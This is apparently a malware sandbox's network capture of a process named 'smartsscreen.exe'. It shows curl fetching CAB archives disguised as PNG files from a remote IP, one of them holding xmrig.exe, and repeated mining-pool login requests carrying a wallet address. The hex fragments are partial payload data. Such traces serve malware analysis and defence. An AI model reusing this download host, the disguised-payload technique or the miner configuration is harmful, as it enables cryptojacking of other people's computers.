May 29, 2024 14:25:17.974286079 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:25 GMT Content-Type: image/png Content-Length: 269597 Last-Modified: Sun, 05 Nov 2023 20:05:22 GMT Connection: close ETag: "6547f582-41d1d" Accept-Ranges: bytes Data Raw: 4d 53 43 46 00 00 00 00 1d 1d 04 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 45 00 00 00 0f 00 01 00 00 7c 07 00 00 00 00 00 00 00 d2 50 95 63 20 00 63 75 72 6c 2e 65 78 65 00 89 76 5f 02 0f 41 00 80 43 4b d5 7d 7d 78 14 45 f2 f0 ec 66 03 0b 04 66 91 a0 11 03 46 1d 35 48 80 c4 5f d4 00 8b 17 21 9b 44 09 12 14 14 25 68 54 e4 f0 2e 9e 08 bb 10 35 6a 70 77 84 b9 61 31 a7 e1 d4 13 ef e0 50 0f 05 95 53 8c 91 0f 4d 48 c8 82 9f e1 43 88 04 e4 5b 76 d8 00 41 20 04 02 d9 b7 aa ba 67 76 36 c1 bb df fb bc 7f bd 79 1e 98 99 ae ee ea ea ea ea ea ea ea ea de b1 0f 96 09 31 82 20 d8 e0 5f 38 2c 08 95 02 fb cb 14 fe fb 5f 29 fc eb 75 f5 9a 5e c2 ea 6e df 5d 53 69 c9 fb ee 9a 09 d3 9f 98 95 34 63 e6 53 bf 9f f9 c8 93 49 8f 3d f2 a7 3f 3d e5 4e 7a f4 f1 a4 99 9e 3f 25 3d f1 a7 a4 ac 71 f7 26 3d f9 d4 d4 c7 87 f4 ec d9 5d e2 38 f2 5d 82 90 67 e9 21 94 2f 17 ee d5 f1 ee 13 7a c5 f4 b0 58 af 10 e2 63 05 a1 b8 ab 20 5c 06 69 f1 00 70 c0 bf d4 58 46 1d be 5b 19 dd 16 4e 3f fd 39 ec f4 b1 af [TRUNCATED] Data Ascii: MSCF,E\|Pc curl.exev_ACK}}xEffF5H_!D%hT.5jpwa1PSMHC[vA gv6y1 _8,_)u^n]Si4cSI=?=Nz?%=q&=]8]g!/zXc \ipXF[N?9+KX^3...D#oLXUHDToW/vtXFP/2#RmGQ2!3YuogN2<>i;Lu/5sfFCz38K{#^NgK:/]4.fTcq=^d>2)T_w#>MiU}0[yO@jmVs-W$1/6Ar,K)RAq/_e#S]dZ6Q'JcrZ=LAPwoRaqVQT:J\|y\|iyJ)Q%OlXgP (AV`3)M)K6$OO{<{cJ+,s6_a*8?{S+VkYU}[dq`xH`D\|x5>G.E]N#O{sPJC6YwB,yi5z[-:,kg2@
May 29, 2024 14:25:17.974313021 CEST	1236	IN	Data Raw: 94 e9 30 7c ca 8d a2 2f 06 e0 4b 57 0d 22 91 48 44 46 51 87 02 a3 ac ac 63 f1 33 5c ef 6d 8a 0b be fc 6f 1b 26 e4 7f 95 25 84 fb 36 03 5d 40 c4 b2 ed 8c 89 82 23 53 08 9e ec 1f 2b 04 33 57 db 84 a5 4e 90 98 40 6c 32 d4 85 1d af 22 ee ac b4 cd a1 Data Ascii: 0\|/KW"HDFQc3\mo&%6]@#S+3WN@l2"+Sk@UQz>b7 d\&6u$1*+~>q{ew(2oQ(,+-AiJ;GlbXA[T(%(y-x`#y6M
May 29, 2024 14:25:17.974325895 CEST	448	IN	Data Raw: a8 82 59 ac 0f a6 a2 88 96 96 38 c2 dd 41 4d 88 15 55 cb b0 c2 b4 aa 40 6c 12 27 02 98 44 2c 52 6f 49 a2 69 42 94 e7 82 62 54 5f c9 c4 71 bf 59 94 d3 2c 3a 27 40 c9 fc 6f c8 7c 28 64 90 69 fb 8a 69 cb e0 5d 21 b4 12 f4 76 b3 ca b1 09 5a df 0b a4 Data Ascii: Y8AMU@l'D,RoIiBbT_qY,:'@o\|(dii]!vZ$VP6k_(P/x 0EJ.fgt9=OV]`j/\Gm0)Jpni@%3m}C jQ^o%O
May 29, 2024 14:25:17.974365950 CEST	1236	IN	Data Raw: 3c c0 c5 4c b0 c7 12 81 c3 79 62 45 6e bc 7f 7a bc e5 57 ff a8 b3 a0 f1 b3 a4 04 e5 07 a5 15 66 da eb 86 ed 99 75 b5 d2 0a 03 8a 8c 81 5a 1f 99 c9 3d c5 8a e7 51 c5 62 16 cf 9e 11 30 17 89 f3 4e 5b 48 0e ed dd b8 3c ce c5 7a 53 a4 e0 9c b3 36 6c Data Ascii: <LybEnzWfuZ=Qb0N[H<zS6lC9#Vp{ya&%+-!20?zQ~5;:\|Y1p5@"q&?n&nO[9@ZH`y\|PnFQat.-9*d@.(
May 29, 2024 14:25:17.974379063 CEST	1236	IN	Data Raw: 61 8b e2 20 5b d4 83 96 28 47 63 f3 6c 83 3a e5 c2 e6 9a 4a f4 fd 85 4e 97 75 9e ff 27 c0 fc 0f 2a 01 04 22 4f d9 26 7e fc 93 fa a7 04 b9 11 ca ca c7 94 80 e8 23 9d 97 8d d3 fd 58 63 ba 07 09 04 25 42 cb a3 fe 40 c2 b0 1a 98 11 7c 6d c8 0b ff 6a Data Ascii: a [(Gcl:JNu'"O&~#Xc%B@\|mjn/8k_PgCvx;zALZ6(ms'ix': ml'Ku2H1?C'ht5GXXj(LHv/!Ikm'&VEWz<
May 29, 2024 14:25:17.974391937 CEST	1236	IN	Data Raw: c4 8a 04 ff e8 af 9c c3 e6 dc cc 13 4a 8b 2d c3 45 df ab 56 5a eb 63 c2 fa 4c b6 05 1d 17 a6 ae d7 ba 46 f6 17 4c 19 7c 8d 9e 46 58 13 e7 d6 e1 be f9 6a 29 8f 79 a7 6c 08 42 b6 df 79 d8 66 a6 6a d7 21 92 30 3b 52 42 1e 47 98 73 6e 87 2c f0 ac f3 Data Ascii: J-EVZcLFL\|FXj)ylByfj!0;RBGsn,IhP3;L^h6RH}un-DLn}L@EU$u6+lF/J+<boX/<p`sR!~Y!,`!rS6D\|mQi-=
May 29, 2024 14:25:17.974405050 CEST	1236	IN	Data Raw: 34 1d ee 57 86 28 0d ca 50 4e 0c a9 81 d1 96 b4 63 0a 86 17 c4 89 15 a3 71 f7 a5 d2 59 e0 ee e3 bc d6 3d 50 ac 18 65 f1 6e c0 a4 77 9d 05 9e 63 f8 09 c9 36 78 d7 64 fc 82 59 e5 a8 77 83 35 f4 8d 7c 4c b9 dc 3d 4b 09 86 c4 69 65 b8 5d b0 d1 32 3f Data Ascii: 4W(PNcqY=Penwc6xdYw5\|L=Kie]2??<b,0QbXR[z2\qNK?g\|\|D%<L0Cz=Zr6sY6m2v}l{_\|a]v?p72_u!{-S}oJ'VEojz,
May 29, 2024 14:25:17.974419117 CEST	328	IN	Data Raw: 41 56 9c bf b0 71 c6 7e 9a b7 26 06 9b 40 fb 60 b8 1d ec b7 cd 56 6d 72 21 90 8e 38 cd a8 30 7a 00 56 61 e9 b8 19 ac ae 94 f0 40 0f aa ad 6f 78 b0 7c 2e 39 7a 7a a4 b5 c0 fc b3 9c 5c 70 61 da 1b 07 8b db 8e 66 8a 2d 13 f0 4e 7f d0 45 aa 7b 3d 53 Data Ascii: AVq~&@`Vmr!80zVa@ox\|.9zz\paf-NE{=SVbsw;`DkFcs8YK#kv>8GYE{Ewhw[Y9R{6UgZG[^z[c0EtKBEZX*gqa
May 29, 2024 14:25:17.974432945 CEST	1236	IN	Data Raw: ec 1b 95 86 f8 16 81 b4 96 44 5b dc 18 07 7a 0b 28 24 e8 42 b1 62 96 45 bb 15 f7 44 4b 40 54 45 39 06 e3 f1 b0 2b 4d a2 83 9d 43 32 f3 10 53 62 ef 70 93 ef dc 55 46 25 7a 96 00 8b 96 bc 85 ed ef ae 41 d1 4a ab 52 87 67 88 a2 ef c8 45 8a 9c f2 6e Data Ascii: D[z($BbEDK@TE9+MC2SbpUF%zAJRgEni-iP&@q$i" LFRI1($2%aUJ=%_2,y*dkn(MAE\|X!h_H(u@cDAXPqi.f
May 29, 2024 14:25:17.974450111 CEST	1236	IN	Data Raw: b2 61 14 56 3c 52 f4 fd 1b e8 83 39 83 24 cc c2 3b 47 46 ab d8 12 39 48 1a bc 6c 13 c5 99 d1 12 8e 2f a6 f5 f6 1f 39 48 f6 b4 22 c7 a1 91 2d 27 b6 d0 3a 2e 3f 3a 17 db ba a4 3d c8 3f 5c 41 a3 c9 cd 0a 68 4d 67 3a 28 a2 4a 8e 37 3c 93 8d be e0 29 Data Ascii: aV<R9$;GF9Hl/9H"-':.?:=?\AhMg:(J7<)_-3}es,TiZ-VhI*Wn%g}B;dgSFPHM,"h<@muvk^4,'+ILKw2hjLN=xI's
May 29, 2024 14:25:17.979329109 CEST	1236	IN	Data Raw: 67 a3 91 3d c0 91 4d 25 64 57 20 b2 3d 28 82 b2 39 c6 f9 d0 3a 44 56 da 19 d9 9f 7b 45 35 3e 8e 23 2b a5 c6 a3 28 a3 a0 fd 85 0b da 8e 8f b8 e6 3a 8a 7a d0 a7 4f d9 cb 8e 62 75 e6 30 6d 0f 55 e7 b6 fc 27 73 63 e9 3a 56 95 9b aa ba e9 58 54 a3 e2 Data Ascii: g=M%dW =(9:DV{E5>#+(:zObu0mU'sc:VXT~x^shx;s3gObc"F!+"dZ!3{YAgdD!['PBfAb48BB~zo6w$q$95HPY[#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49753	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:20.455620050 CEST	154	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 34 41 46 46 71 35 6b 53 69 47 42 6f 5a 34 4e 4d 44 77 59 74 4e 31 38 6f 62 63 38 41 65 6d 53 33 33 44 42 4c 57 Data Ascii: {"id":1,"method":"login","params":{"login":"44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A","pass":"x"}}
May 29, 2024 14:25:20.909532070 CEST	148	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-ewr18121 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49754	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:20.923207045 CEST	142	OUT	Data Raw: 16 03 01 00 89 01 00 00 85 03 03 43 f0 ba ed 99 94 58 4d 6f f3 09 cd db 66 5b 07 f7 d0 2b aa 46 73 19 37 8c f2 e3 2f 19 fb 82 74 00 00 20 cc a8 cc a9 c0 2f c0 30 c0 2b c0 2c c0 13 c0 09 c0 14 c0 0a 00 9c 00 9d 00 2f 00 35 c0 12 00 0a 01 00 00 3c Data Ascii: CXMof[+Fs7/t /0+,/5<
May 29, 2024 14:25:21.392859936 CEST	148	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-ewr18170 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
May 29, 2024 14:25:21.393034935 CEST	7	OUT	Data Raw: 15 03 01 00 02 02 16 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49755	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:21.398622990 CEST	154	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 34 41 46 46 71 35 6b 53 69 47 42 6f 5a 34 4e 4d 44 77 59 74 4e 31 38 6f 62 63 38 41 65 6d 53 33 33 44 42 4c 57 Data Ascii: {"id":1,"method":"login","params":{"login":"44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A","pass":"x"}}
May 29, 2024 14:25:21.874485016 CEST	155	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-nyc-kteb1890064 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49756	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:21.896819115 CEST	142	OUT	Data Raw: 16 03 01 00 89 01 00 00 85 03 03 b0 e4 15 e9 6d 13 d2 fd c6 e7 75 75 71 22 b7 46 e7 9d b7 aa a7 4f 24 4e d4 13 88 16 32 e7 36 02 00 00 20 cc a8 cc a9 c0 2f c0 30 c0 2b c0 2c c0 13 c0 09 c0 14 c0 0a 00 9c 00 9d 00 2f 00 35 c0 12 00 0a 01 00 00 3c Data Ascii: muuq"FO$N26 /0+,/5<
May 29, 2024 14:25:22.345400095 CEST	148	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-ewr18151 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
May 29, 2024 14:25:22.454340935 CEST	7	OUT	Data Raw: 15 03 01 00 02 02 16 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49757	192.229.221.95	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:22.468682051 CEST	154	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 34 41 46 46 71 35 6b 53 69 47 42 6f 5a 34 4e 4d 44 77 59 74 4e 31 38 6f 62 63 38 41 65 6d 53 33 33 44 42 4c 57 Data Ascii: {"id":1,"method":"login","params":{"login":"44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A","pass":"x"}}
May 29, 2024 14:25:23.116615057 CEST	516	IN	HTTP/1.0 501 Not Implemented Content-Type: text/html Content-Length: 357 Connection: close Date: Wed, 29 May 2024 12:25:23 GMT Server: ECLF (lhd/35A0) Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>501 - Not Implemented</title></head><body><h1>501 - Not Implemented</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49758	192.229.221.95	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:23.124490023 CEST	142	OUT	Data Raw: 16 03 01 00 89 01 00 00 85 03 03 5e 97 b5 8c 95 63 86 64 cc 09 59 a9 9e 02 e8 df 85 58 38 ed 30 af d2 64 ac f9 e0 1a a6 78 51 6f 00 00 20 cc a8 cc a9 c0 2f c0 30 c0 2b c0 2c c0 13 c0 09 c0 14 c0 0a 00 9c 00 9d 00 2f 00 35 c0 12 00 0a 01 00 00 3c Data Ascii: ^cdYX80dxQo /0+,/5<
May 29, 2024 14:25:23.769167900 CEST	516	IN	HTTP/1.0 501 Not Implemented Content-Type: text/html Content-Length: 357 Connection: close Date: Wed, 29 May 2024 12:25:23 GMT Server: ECLF (lhd/35FD) Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>501 - Not Implemented</title></head><body><h1>501 - Not Implemented</h1></body></html>
May 29, 2024 14:25:23.769334078 CEST	7	OUT	Data Raw: 15 03 01 00 02 02 16 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49760	111.90.158.40	80	7728	C:\Users\user\Desktop\curl.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:24.125575066 CEST	103	OUT	GET /taskhostw.png?t=1716985523 HTTP/1.1 User-Agent: curl/7.35.0 Host: 111.90.158.40 Accept: /
May 29, 2024 14:25:25.098014116 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:32 GMT Content-Type: image/png Content-Length: 2432673 Last-Modified: Tue, 23 Jan 2024 22:54:08 GMT Connection: keep-alive ETag: "65b04390-251ea1" Accept-Ranges: bytes Data Raw: 4d 53 43 46 00 00 00 00 a1 1e 25 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 ac 00 01 00 00 b6 55 00 00 00 00 00 00 00 38 58 48 1c 20 00 78 6d 72 69 67 2e 65 78 65 00 25 08 c7 c5 37 3f 00 80 43 4b bc 9a 7d 5c 54 d5 ba c7 37 2f 5b 40 1d 67 78 13 3c 4a 8c 4a 46 9a 80 a1 89 c7 d4 ad b2 73 63 98 08 98 e3 0b 36 8a 28 e6 1b 07 e1 88 a9 1f 31 a4 c4 69 3e 97 5b de 2e b7 17 43 cd 22 7b a3 b2 1a d4 7b ce 24 e8 c6 d4 24 3b 15 e9 b5 48 d1 36 62 45 a9 45 75 ce e5 3e eb 79 d6 9e 17 06 b9 dd f3 c7 e5 f3 71 d6 de df f5 ac df 7a f6 7a 79 e6 d9 cb 99 b5 a0 52 08 10 04 21 10 fe 75 75 09 82 43 a0 3f 49 f8 df ff e2 fd 04 61 40 ec a1 01 c2 c1 90 d3 43 1d 7e e9 a7 87 66 e7 af 5c 6f 2e 28 5c b7 a2 70 c9 1a 73 ee 92 b5 6b d7 15 99 97 e6 99 0b 8b d7 9a 57 ae 35 a7 ce ce 32 af 59 b7 2c 2f c1 60 e8 1b c7 35 52 3f 3a d5 2e bc b9 d7 a1 ff cb 3b b1 a7 ce 80 e5 cb 75 2a 94 bb 8d 79 8e 40 28 33 d5 3d 75 21 58 be 5c b7 0d cb 97 ea 46 a0 dd 4b 75 83 a1 dc 7f fc a5 ba 30 bc df 57 17 85 5a fb [TRUNCATED] Data Ascii: MSCF%,FU8XH xmrig.exe%7?CK}\T7/[@gx<JJFsc6(1i>[.C"{{$$;H6bEEu>yqzzyR!uuC?Ia@C~f\o.(\pskW52Y,/`5R?:.;uy@(3=u!X\FKu0WZyouT:nS9?u\tacoC&`'!<VL4~]BVtFz{u)uYnCqx0+=2Kg%~"(!6f6p%hCiekLJ 3i%Ms!yoNw;gB3P~PRg<P\ng}([d?4G;67nm=r\rs66X>v~Sls{m$TEMK.T62SP$0GOBEEjk!!#3#JnW4wre>D#JKsDjTZUqsZNQ!H,#FDS\R6Ta<@$XM3hUU>dI~HJ&E\|y>[#\|U.CqMZ^,ply!4WS EE>W`oFk'\|2SDX9E0>rr
May 29, 2024 14:25:25.098050117 CEST	1236	IN	Data Raw: 47 ae 76 eb b3 ef 1a 6d f6 3d 7e b0 60 9b 95 0a 31 67 7a 96 a0 d8 37 c7 49 8a ed 73 cd 32 c9 4f 48 b7 2b 66 b6 98 cc e9 b6 7a c5 9e 1d 97 a2 3d 0a 54 29 53 4d 8a 1d 17 ad 32 b1 b3 28 44 b1 c5 0c 87 96 ed 27 14 bb e1 ed 09 13 04 6d bf df 58 50 b4 Data Ascii: Gvm=~`1gz7Is2OH+fz=T)SM2(D'mXPA)A8lMiMiK9?_~byLKFo.{.?Y0g79,`%\|zr*]gObKR89AZk89CV\|SqdiQePN
May 29, 2024 14:25:25.098062038 CEST	1236	IN	Data Raw: 13 9d c8 44 99 c4 4e 94 70 b7 7f 92 da d7 53 fb 23 ae f6 07 78 fb b3 9f 63 fb 7e 7a fb 99 ee f6 ec 3c 45 cb a4 f6 4f 51 fb 45 f3 f5 f6 8f f0 f6 4f 52 fb f3 49 bc 7d 5f 57 7b ed fa 27 c9 42 85 78 f9 1e b6 26 22 2f 42 31 15 53 21 55 7c 60 66 96 00 Data Ascii: DNpS#xc~z<EOQEORI}_W{'Bx&"/B1S!U\|`fo]vR`lSSJoUez}li{v]o(Jgv~CSo}O8}l&Oa^k2&
May 29, 2024 14:25:25.098073959 CEST	1236	IN	Data Raw: 9a be ee 2b 6d 6b 0f f1 ee e7 c3 5f b4 ce de 7f fa b3 1e e2 dd c1 8b 29 7f 98 bc e2 cd f5 3d c4 bb d6 ed 39 07 1b 8e fd 63 5b 0f f1 ae a8 71 cd f2 79 1f 06 1f e8 21 de 1d 29 6e 9c 52 f6 db 47 cf f7 10 ef 62 3f 3c 93 19 2e 26 3e d6 43 bc 4b da be Data Ascii: +mk_)=9c[qy!)nRGb?<.&>CK;c@O[[+}x<GxW^tjwS Z}+M11mw`Bnwww0xW]-S(qw@+l\|qS_W/})_\|$F\|qdt1[
May 29, 2024 14:25:25.098086119 CEST	896	IN	Data Raw: a3 02 37 c6 d0 d4 b8 78 e8 29 1d af d3 e3 52 d2 ed 00 92 cf c2 10 ff b2 28 53 d0 56 8f 8f 82 74 d4 6e 08 bc 1d c7 db d2 16 d0 d2 3d 5e 78 ea 0f 45 7d e3 7c d4 0f f6 d0 ef ef ab ff b1 05 f4 fb 73 fd 08 5d 7f df 57 bd e9 2f 99 cf f4 a7 2c 22 ff e7 Data Ascii: 7x)R(SVtn=^xE}\|s]W/,"{?G=OU?dfCJX]oDo]_GkR6Su^uLUO$?02]Bo+-Oaqg[\|X/s{'
May 29, 2024 14:25:25.098098993 CEST	1236	IN	Data Raw: 0f dd b7 66 9e f4 11 cb fb 8c 7c 62 d2 74 4e b3 b5 60 3e c6 c7 92 31 db 1b f0 7b 8a 59 b6 be 8a 4c b4 38 fa 29 f1 bc 11 ff ff 99 f9 6b 15 93 d2 f1 7f 73 3f fd f3 3d 42 2d d7 2c 84 fe fb d1 b1 26 bc 15 84 47 31 11 45 b4 46 d3 fe e0 b7 61 68 62 7b Data Ascii: f\|btN`>1{YL8)ks?=B-,&G1EFahb{s&i{s`<0y}w/j8>I U}moc=&c6,1p)\|m#)8B;`Y7m\|]"B@L6uMnpE1qO^!
May 29, 2024 14:25:25.098109961 CEST	1236	IN	Data Raw: 87 d4 2d d0 5a 73 ac c6 ad 5d a9 5b a0 2a 0f b1 bd 36 c6 1c 89 1f fe e2 22 15 38 88 7c 94 8c 1f 44 3e 9e fe 03 5b b4 37 c6 f7 59 34 94 94 d4 78 35 6b a5 1d 79 bf 15 16 ae 2b 62 f2 0f 3f 80 ee 8c f6 72 3c ef 22 a9 ea d4 d3 9e 8d f1 5f 67 40 b4 ea Data Ascii: -Zs][6"8\|D>[7Y4x5ky+b?r<"_g@$'?&"v%SC9_~F^TZLJJ}Q@pxr2,1\LpLLS+hko!%E/@l`he8l?30c+W:nH]TC3m
May 29, 2024 14:25:25.098121881 CEST	1236	IN	Data Raw: 26 97 ac 2e d0 e7 aa 63 76 c2 f3 2b 45 e0 a4 c1 9f 3f ef 13 49 0f cb ee ba 8d 2d 88 81 a8 5c 39 74 50 0c a4 40 0c 10 3d 69 f2 0f 65 b8 74 fc 27 ab 9f e9 d1 75 ba 8d e9 cd 90 c2 3e d9 72 12 d5 fb 18 d3 0d 29 83 e2 dd 41 d4 31 41 c3 22 86 d3 76 65 Data Ascii: &.cv+E?I-\9tP@=iet'u>r)A1A"ve,.bk1qX%E]S Qm{\|V>.0(ej,NGeV+RJjvDbto[&3yKO
May 29, 2024 14:25:25.098134995 CEST	1236	IN	Data Raw: f6 1c 1c 13 38 6b 5d 3d 05 47 aa 63 e6 9b fb a6 2b 07 9b fb 44 cc c8 ce d8 cf 32 b2 c0 7b 43 99 db 5b 64 5b 01 e1 bb 91 95 3d fc b7 01 e9 cb c3 89 39 fd 33 a8 a9 e7 c7 44 9b 61 0d 5b e1 2b 63 63 29 16 42 89 ab 36 61 d9 56 61 f9 0c 33 57 da a5 3d Data Ascii: 8k]=Gc+D2{C[d[=93Da[+cc)B6aVa3W=/z_\|&W#[`bESS)42>;HSf(])yf=#qs+NG:`k>Z6ih'qke9!c0I&G5XaS
May 29, 2024 14:25:25.098146915 CEST	1236	IN	Data Raw: d1 33 2f 26 07 d2 af 00 bc 46 07 c7 c2 3f 9c f0 b5 ac a1 83 17 69 75 d6 91 73 ba 8e 6f 5c 13 72 81 24 4c a8 8a 3d 94 6d 65 c3 37 12 ac 2d 1d 9d b6 d7 3e 3c 12 7e 54 0e 46 fc 1f 4b e1 b6 11 62 e0 d4 08 1f 6d a9 c2 1c bb e8 8c 49 98 bd d8 25 be a8 Data Ascii: 3/&F?iuso\r$L=me7-><~TFKbmI%cP/\|FC8HI{""\|$zg@={~alEKBBhfeO>n{R8a>&_A]vh81[en'\|H(%t9$\|\|D{ou+YSJu
May 29, 2024 14:25:25.103892088 CEST	1236	IN	Data Raw: 6d c0 a6 78 85 bd f7 5a 24 da ea a1 67 84 dc 4e b1 fc bc a9 ec 92 60 63 15 be 49 4e 90 22 1e 75 95 ce 2c 2d 5a bb 29 b8 cd 74 cd d3 36 bf 0d ba f1 a5 c3 e1 e7 94 49 d8 70 93 37 d8 b5 6e d8 8a 98 e9 c6 eb 48 20 6c c6 56 ff 08 f8 6b 46 75 f5 bd 8e Data Ascii: mxZ$gN`cIN"u,-Z)t6Ip7nH lVkFua]S-+[{ljV.BO$G{~ 8s&VV bnJ<x's$[H1+x8 VgH<i)ukw,p(QK:)Cbz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49759	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
